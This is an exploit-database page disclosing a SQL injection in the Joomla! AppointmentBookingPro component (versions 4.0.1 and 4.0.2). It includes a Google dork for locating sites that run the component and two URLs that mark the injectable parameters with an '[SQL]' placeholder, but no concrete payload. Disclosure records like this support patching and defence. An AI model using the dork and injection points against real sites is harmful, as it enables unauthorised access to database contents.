header-logo
Suggest Exploit
vendor:
AppointmentBookingPro
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AppointmentBookingPro
Affected Version From: 4.0.1
Affected Version To: 4.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:appointmentbookingpro:appointmentbookingpro:4.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component AppointmentBookingPro v4.0.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component AppointmentBookingPro v4.0.1 and v4.0.2. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Ensure that all user-supplied input is properly validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component AppointmentBookingPro v4.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_rsappt_pro3
# Date: 21.02.2017
# Vendor Homepage: http://appointmentbookingpro.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/appointmentbookingpro/
# Demo: http://demo.appointmentbookingpro.com/
# Version: 4.0.1 / 4.0.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/component/rsappt_pro3/booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999[SQL]
# http://localhost/[PATH]/index.php?option=com_rsappt_pro3&view=resourceslist&tags=[SQL]
# # # # #